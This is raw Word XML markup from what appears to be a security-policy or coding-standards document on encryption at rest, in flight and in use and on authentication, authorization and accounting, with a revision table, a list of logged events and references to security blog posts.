          <w:p w14:paraId="5C4FF30D" w14:textId="120052C8" w:rsidR="00381847" w:rsidRDefault="00667DD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42490BEA" w:rsidR="00381847" w:rsidRDefault="00667DD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59C25402" w:rsidR="00381847" w:rsidRDefault="00667DD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59FA4297" w:rsidR="00381847" w:rsidRDefault="00667DD0">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61E2DC63" w:rsidR="00381847" w:rsidRDefault="00667DD0">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6466DFC" w:rsidR="00381847" w:rsidRDefault="004D4457">
            <w:r>
              <w:t xml:space="preserve">Encryption in rest is the encryption of data that is inactive as it is not moving between networks or devices such as archived data in a database. </w:t>
            </w:r>
            <w:r w:rsidR="0058219B">
              <w:t>The policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for encryption of data in rest </w:t>
            </w:r>
            <w:r w:rsidR="0058219B">
              <w:t>includes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> incorporating full disk encryption to ensure hackers cannot access data on a lost drive and implementing data loss prevention solutions (DLPs)</w:t>
            </w:r>
            <w:r w:rsidR="0058219B">
              <w:t>. With DLPs, we can search and find sensitive data and block access to that data from certain users if a breach occurs</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0058219B">
              <w:t xml:space="preserve"> The last three production stages are emphasized with this policy.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D2BA046" w:rsidR="00381847" w:rsidRDefault="004D4457">
            <w:r>
              <w:t xml:space="preserve">Encryption at flight is the encryption of data that is moving from one location to another such as when it is transmitted over a network. </w:t>
            </w:r>
            <w:r w:rsidR="0058219B">
              <w:t>The policy for encryption of data at flight includes the incorporation of firewalls and authentication, implementing automation to block malicious files and encrypt data before it is in transit, using TLS for https on all connections, and using certificates signed by a Certificate Authority so that our public key is verified by a trusted source. DLPs can also be used to scan emails and attachments</w:t>
            </w:r>
            <w:r w:rsidR="003D1B25">
              <w:t xml:space="preserve"> to identify leaks. The stages emphasized within this policy include the entirety of pre-production for proper planning and implementation of automation, and the first two stages of production.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61F1D36" w:rsidR="00381847" w:rsidRDefault="003D1B25">
            <w:r>
              <w:t>Encryption in use is the encryption of data that is being accessed and processed by users. Protection of this data needs to start in pre-production and especially enforced during the “Build” and “Verify and test” stages because we cannot control what a hacker does with our data once they have stolen it. Authorization and authentication are extremely important so that only authorized individuals have permission to access data that is strictly necessary for them to complete their jobs. This begins in the early stages of per-production to map this out</w:t>
            </w:r>
            <w:r w:rsidR="00AD032F">
              <w:t xml:space="preserve"> and throughout production to ensure its effectiveness.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E98F23B" w:rsidR="00381847" w:rsidRDefault="003D1B25">
            <w:r>
              <w:t xml:space="preserve">Authentication refers </w:t>
            </w:r>
            <w:r w:rsidR="004D3BAE">
              <w:t>to ensuring a user is who they say they are; only users who enter valid credentials during user login should have access to our system. This is accomplished when the user’s authentication credentials successfully match credentials stored in our database. The addition of new users, deletion of current users, and monitoring of all users is the responsibility of system administrators.</w:t>
            </w:r>
            <w:r w:rsidR="00DC73CA">
              <w:t xml:space="preserve"> Authentication must be prioritized during all stages of pre-production and is vital to be monitored during production.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ADE15A5" w:rsidR="00381847" w:rsidRDefault="004D3BAE">
            <w:r>
              <w:t>Once a user is authenticated, they shall only be allowed the activities, services, and resources that they are permitted/authorized to use based on their user level of access. For example, administrators may have more privileged access, but only to what is necessary to complete their jobs.</w:t>
            </w:r>
            <w:r w:rsidR="00DC73CA">
              <w:t xml:space="preserve"> Authorization must also be prioritized during all stages of pre-production and monitored during production.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15E86778" w:rsidR="004D3BAE" w:rsidRPr="004D3BAE" w:rsidRDefault="004D3BAE">
            <w:r>
              <w:t>Accounting is the measurement of resources that users consume during their network access to our application. Administrators need to see statistics for logging sessions, session duration, files accessed by users, and data both sent and received. In addition, administrators need to see who</w:t>
            </w:r>
            <w:r w:rsidR="00DC73CA">
              <w:t xml:space="preserve"> logged in, the actions they performed, and what time they were performed. Accounting should take place throughout the entirety of the pre-production and production cycle. This is the only way to ensure a proper response to any security breach and the stabilization of our system if an attack were to occur.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43D2D310" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5A8D">
        <w:t>logins</w:t>
      </w:r>
      <w:r w:rsidR="004D3BAE">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212EB2D" w14:textId="214F308D" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Changes to the database</w:t>
      </w:r>
      <w:r w:rsidR="004D3BAE">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4F47D" w14:textId="4D8494B4" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Addition of new users</w:t>
      </w:r>
      <w:r w:rsidR="004D3BAE">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B442C3" w14:textId="3DEBFCD4" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User level of access</w:t>
      </w:r>
      <w:r w:rsidR="004D3BAE">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C722D80" w14:textId="6BC0883D" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="008D5A8D">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Files accessed by users</w:t>
      </w:r>
      <w:r w:rsidR="004D3BAE">
        <w:t>*</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88224BA" w:rsidR="00381847" w:rsidRDefault="002F0BE2">
            <w:r>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC436A6" w14:textId="2747ECF5" w:rsidR="00381847" w:rsidRDefault="00381847">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B713D2C" w14:textId="31C156B9" w:rsidR="00381847" w:rsidRDefault="00DC73CA">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Coding Standards completed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="124483AC" w14:textId="054A2A92" w:rsidR="00381847" w:rsidRDefault="00DC73CA">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Raymond Aponte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697C2A49" w14:textId="0A7C47D1"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0829AC7" w:rsidR="00381847" w:rsidRDefault="002F0BE2">
            <w:r>
              <w:t>3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305DA4F1" w14:textId="2B43DFB5" w:rsidR="00381847" w:rsidRDefault="00DC73CA">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>12/11/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="138D7C42" w14:textId="2634DB7F" w:rsidR="00381847" w:rsidRDefault="00DC73CA">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Completion of documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35E4A720" w14:textId="5CA5F480" w:rsidR="00381847" w:rsidRDefault="00DC73CA">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Raymond Aponte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FEC447A" w14:textId="65A1C7D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5D78B01D" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="7A09310F" w14:textId="4DABF533" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="58EA7CF8" w14:textId="36C90EF6" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="5A4FB72D" w14:textId="3F3321F3" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="27AA30A2" w14:textId="47188A06" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="1373D37C" w14:textId="5D850493" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="530D7503" w14:textId="464EC65C" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="571CA232" w14:textId="00872BCA" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="5CA78CC5" w14:textId="22D037BD" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="28F70841" w14:textId="2804811A" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="4FD993F7" w14:textId="690E5C8B" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="67013D53" w14:textId="359A8A85" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="04C0E357" w14:textId="76DE3DF8" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="46FC4A3B" w14:textId="57B88C14" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="5DE2C284" w14:textId="5F4D2754" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="2DEAB881" w14:textId="20B4F16D" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="589E9DCA" w14:textId="58183B41" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="34A60388" w14:textId="5FE246DB" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="06C52038" w14:textId="5371C3F5" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="4E777002" w14:textId="5710ED0B" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="3F62A38D" w14:textId="462928EC" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="3413B143" w14:textId="728434C6" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2"/>
    <w:p w14:paraId="54E97D2D" w14:textId="4CFF2328" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2" w:rsidP="002F0BE2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693069CE" w14:textId="2105DC65" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2" w:rsidP="002F0BE2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Argintaru, D. (2021, July 22). </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Data Encryption - Data at rest vs in transit vs in use options</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Mimecast. Retrieved December 10, 2022, from https://www.mimecast.com/blog/data-in-transit-vs-motion-vs-rest/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4E156" w14:textId="64EB977B" w:rsidR="002F0BE2" w:rsidRPr="002F0BE2" w:rsidRDefault="002F0BE2" w:rsidP="002F0BE2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Mylonas, L. (2018, November 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What is AAA Security? an introduction to authentication, Authorisation and Accounting</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Codebots. Retrieved December 10, 2022, from https://codebots.com/application-security/aaa-security-an-introduction-to-authentication-authorisation-accounting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015804DE" w14:textId="77777777" w:rsidR="002F0BE2" w:rsidRPr="002F0BE2" w:rsidRDefault="002F0BE2" w:rsidP="002F0BE2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">OpsCompass Staff. (2015, July 10). </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Are you encrypting your data-in-flight? if not, you should be.</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0BE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> OpsCompass. Retrieved December 10, 2022, from https://opscompass.com/resources/blog/are-you-encrypting-your-data-in-flight-if-not-you-should-be/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4A060" w14:textId="77777777" w:rsidR="002F0BE2" w:rsidRDefault="002F0BE2" w:rsidP="002F0BE2"/>
    <w:sectPr w:rsidR="002F0BE2">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7102F" w14:textId="77777777" w:rsidR="0029469F" w:rsidRDefault="0029469F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1FABEC80" w14:textId="77777777" w:rsidR="0029469F" w:rsidRDefault="00294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A2CF0" w14:textId="77777777" w:rsidR="0029469F" w:rsidRDefault="0029469F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1649AD26" w14:textId="77777777" w:rsidR="0029469F" w:rsidRDefault="00294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BE5CB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2918F2F0"/>
    <w:lvl w:ilvl="0" w:tplc="2376B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645663D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8E2536E"/>
    <w:lvl w:ilvl="0" w:tplc="F19CA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90515F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD76BEF2"/>
    <w:lvl w:ilvl="0" w:tplc="0248C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549774">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="272368981">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1391734268">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1475638250">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1230967169">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1426069612">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1982802496">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="183711062">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1343240840">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="191378854">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1355231470">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1131438402">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1413624655">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1099449529">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1140265605">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1926574788">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2044863919">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="990984755">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1047875872">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1826745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7E4C"/>
    <w:rsid w:val="0008274A"/>
    <w:rsid w:val="000A1B62"/>
    <w:rsid w:val="000C3348"/>
    <w:rsid w:val="001646BD"/>
    <w:rsid w:val="00167423"/>
    <w:rsid w:val="00171556"/>
    <w:rsid w:val="00192176"/>
    <w:rsid w:val="001A18E8"/>
    <w:rsid w:val="001D4766"/>
    <w:rsid w:val="001F232B"/>
    <w:rsid w:val="00202458"/>
    <w:rsid w:val="0021682A"/>
    <w:rsid w:val="00225E6A"/>
    <w:rsid w:val="002474B4"/>
    <w:rsid w:val="00267F7F"/>
    <w:rsid w:val="00275C69"/>
    <w:rsid w:val="0029469F"/>
    <w:rsid w:val="002B23D7"/>
    <w:rsid w:val="002C38B9"/>
    <w:rsid w:val="002F0BE2"/>
    <w:rsid w:val="00312FB6"/>
    <w:rsid w:val="00317E68"/>
    <w:rsid w:val="00320576"/>
    <w:rsid w:val="00331AB6"/>
    <w:rsid w:val="00332392"/>
    <w:rsid w:val="003401D8"/>
    <w:rsid w:val="003521B3"/>
    <w:rsid w:val="00381847"/>
    <w:rsid w:val="00394EEB"/>
    <w:rsid w:val="003A7CF9"/>
    <w:rsid w:val="003B0A5C"/>
    <w:rsid w:val="003C2366"/>
    <w:rsid w:val="003D1B25"/>
    <w:rsid w:val="003D6F4A"/>
    <w:rsid w:val="00413CFA"/>
    <w:rsid w:val="00416161"/>
    <w:rsid w:val="00492D52"/>
    <w:rsid w:val="004D3BAE"/>
    <w:rsid w:val="004D4457"/>
    <w:rsid w:val="004E12CE"/>
    <w:rsid w:val="004E2F8D"/>
    <w:rsid w:val="00533084"/>
    <w:rsid w:val="00536054"/>
    <w:rsid w:val="0057667C"/>
    <w:rsid w:val="0058219B"/>
    <w:rsid w:val="0059536C"/>
    <w:rsid w:val="005A3503"/>
    <w:rsid w:val="005B7417"/>
    <w:rsid w:val="005C0C1A"/>
    <w:rsid w:val="005F3C12"/>
    <w:rsid w:val="00667DD0"/>
    <w:rsid w:val="006D38A7"/>
    <w:rsid w:val="006F6766"/>
    <w:rsid w:val="00710D17"/>
    <w:rsid w:val="00733063"/>
    <w:rsid w:val="007864CE"/>
    <w:rsid w:val="00787E48"/>
    <w:rsid w:val="0079083E"/>
    <w:rsid w:val="007F6A57"/>
    <w:rsid w:val="00895AA1"/>
    <w:rsid w:val="008C3FC6"/>
    <w:rsid w:val="008D5A8D"/>
    <w:rsid w:val="00904920"/>
    <w:rsid w:val="00953D20"/>
    <w:rsid w:val="00974DF7"/>
    <w:rsid w:val="009B710E"/>
    <w:rsid w:val="009F1B64"/>
    <w:rsid w:val="009F7011"/>
    <w:rsid w:val="00A04F5E"/>
    <w:rsid w:val="00A1232C"/>
    <w:rsid w:val="00A64600"/>
    <w:rsid w:val="00A8636D"/>
    <w:rsid w:val="00AA1628"/>
    <w:rsid w:val="00AA2CAD"/>
    <w:rsid w:val="00AD032F"/>
    <w:rsid w:val="00AE25B5"/>
    <w:rsid w:val="00B21AEC"/>
    <w:rsid w:val="00B43CD0"/>
    <w:rsid w:val="00B475A1"/>
    <w:rsid w:val="00B83D35"/>
    <w:rsid w:val="00B92A44"/>
    <w:rsid w:val="00BC2B54"/>
    <w:rsid w:val="00BD756B"/>
    <w:rsid w:val="00C07791"/>
    <w:rsid w:val="00C73007"/>
    <w:rsid w:val="00CB2327"/>
    <w:rsid w:val="00CB5589"/>
    <w:rsid w:val="00D01753"/>
    <w:rsid w:val="00D211BA"/>
    <w:rsid w:val="00D30268"/>
    <w:rsid w:val="00D66564"/>
    <w:rsid w:val="00D75159"/>
    <w:rsid w:val="00DA57A8"/>
    <w:rsid w:val="00DC73CA"/>
    <w:rsid w:val="00E170F5"/>
    <w:rsid w:val="00E31CA4"/>
    <w:rsid w:val="00E54E9E"/>
    <w:rsid w:val="00E769D9"/>
    <w:rsid w:val="00E82BAD"/>
    <w:rsid w:val="00E910C0"/>
    <w:rsid w:val="00EE4448"/>
    <w:rsid w:val="00EF3F66"/>
    <w:rsid w:val="00F51FA8"/>
    <w:rsid w:val="00F72634"/>
    <w:rsid w:val="00F8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167423"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A123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5761">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66805685">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="106972906">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="283387928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="289170082">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="324362531">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="334846165">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="450705912">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
